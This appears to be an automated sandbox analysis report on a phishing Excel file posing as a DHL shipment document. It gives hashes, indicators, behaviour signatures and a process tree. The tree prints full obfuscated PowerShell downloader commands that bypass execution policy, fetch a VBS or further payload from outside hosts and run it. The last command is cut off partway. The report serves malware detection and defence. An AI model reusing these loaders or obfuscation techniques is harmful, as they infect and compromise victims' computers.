Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
06/08/2024, 11:33
General
-
Target
DHL Shipment Doc.xls
-
Size
684KB
-
MD5
a064fe438f311ba1c878dd8128c21d2c
-
SHA1
9c80a9b91e0bcdbfb5da53285c0ec521aefa100f
-
SHA256
e3c29ec01ba1b41c8af9b4fc05dd4325069f4528cf7ca0c74713e6b0cc4aedc0
-
SHA512
d47154b5f9127f6a023c87235034d1d2b804d8160fbb49c2ff4ec405c02da3e6bc5c154aa29254ff40325d41396d52aef1928f3fb8deae3c85348b55550f2243
-
SSDEEP
12288:AuHbcbiFv+MIFx+tMiGSa7waxlvV43IGBHDSTLfim4++j4YKKTvWrHPqHIiB:pBFv+MIPyGSeMIEHGLfiz++dK+vWr4B
Malware Config
Extracted
http://servidorwindows.ddns.com.br/Files/vbs.jpeg
http://servidorwindows.ddns.com.br/Files/vbs.jpeg
Signatures
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Evasion via Device Credential Deployment 1 IoCs
-
Drops file in System32 directory 3 IoCs
-
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DHL Shipment Doc.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i-c-1sif.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC69.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFC68.tmp"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀LwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cgB2㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀dwBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bu㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀LgBj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀cg㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YgBz㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀agBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀ZQBi㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bgB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB3㆛ ⺞ ⏬ ⦦ ⼀C0㆛ ⺞ ⏬ ⦦ ⼀TwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀VwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgB5㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀ew㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀dwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBE㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dwBu㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀R㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQ㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀aw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BX㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀aQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LQBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBG㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀bw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀bwB3㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bm㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀ZwBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBu㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀ZQBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀UwB5㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀LgBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀RQBu㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀bwBk㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀Og㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀FU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Dg㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀cgB0㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀8㆛ ⺞ ⏬ ⦦ ⼀Dw㆛ ⺞ ⏬ ⦦ ⼀QgBB㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀RQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀XwBT㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀QQBS㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀Pg㆛ ⺞ ⏬ ⦦ ⼀+㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀RgBs㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Dw㆛ ⺞ ⏬ ⦦ ⼀P㆛ ⺞ ⏬ ⦦ ⼀BC㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀UwBF㆛ ⺞ ⏬ ⦦ ⼀DY㆛ ⺞ ⏬ ⦦ ⼀N㆛ ⺞ ⏬ ⦦ ⼀Bf㆛ ⺞ ⏬ ⦦ ⼀EU㆛ ⺞ ⏬ ⦦ ⼀TgBE㆛ ⺞ ⏬ ⦦ ⼀D4㆛ ⺞ ⏬ ⦦ ⼀Pg㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀bgBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀BP㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ 